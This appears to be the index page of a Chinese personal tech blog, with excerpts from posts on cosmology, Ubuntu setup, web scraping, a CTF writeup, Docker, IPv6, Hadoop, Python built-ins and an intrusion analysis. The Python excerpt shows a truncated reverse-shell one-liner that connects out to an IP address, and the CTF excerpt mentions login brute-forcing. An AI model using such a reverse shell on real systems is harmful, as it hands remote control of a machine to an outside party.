Les1ie

锲而不舍,金石可镂。

宇宙学、超新星和引力波

讲座语录

序 看到围合贴的活动通知,慕名而来 讲座随笔 注:随笔记录,可能存在笔误 2018年6月4日19:25:12 王力帆 紫金山天文台 最重要的分支: 宇宙学 宇宙学 光速有限,因此可以观测遥远的星系,并研究宇宙数十亿年前的性质 根据亮度变化周期来判定他的距离 超新星判定距离 白矮星的亮度恒定,越暗则越远 超新星非常亮,几十亿光年都能测到 某一个星系旁边突然出现...

安装ubuntu操作系统

新手第1w次安装ubuntu

序 因为某些原因需要给一个i7-8550u的cpu, nvme 128g ssd的mini pc 安装ubuntu 大概长这个样子 出厂的时候是装好了win10的,但是我们的程序需要运行在ubuntu上 以前是直接就装好了ubuntu 16.04.3,用了很长一段时间,但是最近发现120G 的硬盘被撑满了, 看了下发现是 /var/log/kern.log, /var/log/sys...

和教务处反爬虫之间的游戏

感谢教务处为我们技术进步做出的不懈努力

序 之前写了个爬学校各大网站新闻然后推送到邮箱的程序,上线了几个月,一直正常运行,还收获了一些用户 直到前几天突然发现.. 似乎很久没收到过邮件推送的教务处的更新了,莫非教务处改了网页,爬虫拿不到数据了? 手抖删库 ssh连到服务器里面,检查了下负责教务处的jwc.py, 发现运行返回值是None, 正常情况下是返回当前页面所有的新闻的标题和url, 每个新闻的具体内容,确认就是这里出...

2017 美亚柏科邀请赛 writeup

一个辣鸡随手写的writeup

序 拿flag是不可能的了,这辈子都不可能拿flag的。 题目又不会,只能看看各位神仙师傅的wp才能勉强说是我是搞安全的。 逛大佬的博客就像是回了家一样,这里的师傅都好有才,说话又好听,我超喜欢这里的。 web2 题目 login as webmaster 打开是一个登录框 看起来像是一个爆破或者登录绕过。 拿出了1w的字典,php万能密码爆破许久,试过了root, admin,ad...

SCURSS 开发小记

一个好玩的网站消息推送系统

序 2017年暑假的时候经常逛freebuf,每天都会刷好几次 因为懒得打开,于是用了ifttt, 连接了pocket, 手机上有pocket的客户端,设定规则是 if freebuf更新文章了,then 添加到我的pocket阅读列表里面。 最初还有点用,但是后来渐渐发现这样用有点问题,不是随时有时间看,但是他的更新会一直加,加上当时订阅了好几个网站的更新,所以很快pocket列表也...

Docker Compose容器编排

序 因为某些原因,写了个新闻聚合的应用,取名SCURSS ,这里想分享的是用容器进行虚拟化的思路 容器 具体内容就是一个爬虫定期爬取教务处,计算机学院官网,学工部,然后检查新闻内容是否发生了变化,如果发生了变化,那么更新数据库,然后邮件推送给订阅的用户发生更新了的消息 这里想说的是用的docker来部署的服务, 虽然这不是什么新鲜的东西,但是我还没处理过这么多的容器之间的依赖关系,所以简...

Ipv6随笔

一直没有仔细地研究过的ipv6

0x00 序 总是有人问川大的Ipv6是多少,看着这个问题怪别扭,就像问川大的教室是哪个一样,这种问题怎么回答? 不过或许可以直接回答是哪一个CIDR段(数据来源于 这里 ) 2001:250:2003::/48 也就是 2001:250:2003:0000:0000:0000:0000 到 2001:250:200:ffff:ffff:ffff:ffff 分配给四川大学的一共...

配置hadoop环境

生命在于折腾

0x00 序 前两天一同学来找我问爬虫,知道周五上午有个课程要说爬虫,瞬间兴趣来了,于是今天去上了课,发现挺有趣,现在让我们配置Hadoop,简要记录下过程 0x01 docker 国际惯例,找别人的docker镜像 $ docker search hadoop NAME DESCRIPTION ...

python built-in function

python 的內建函数

0x00 2017-8-8 14:17:43 一直没有怎么用过python的几个内建函数,这里学习一下 0x01 exec 这个嘛..执行代码片段,反弹shell不解释 In [1]: s = 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("111.23...

某服务器被入侵,追踪入侵者

记录一次入侵分析的经历

0x01 一个linux运维的群里面,今天突然有人说服务器被黑了,找人帮忙分析,日志被清除了,只留下了几条执行过的命令,他给出了个几个截图,都是他执行过的命令 0x02 看了下他的截图, 攻击者最初是如何进入系统的已经无法知道了,说让他给我他公司服务器地址让我测试也没后文,所以对方如何进入服务器我也不得而知,他说服务器是tomcat的,觉得可能有apache的几个漏洞进去的,或者是账户被...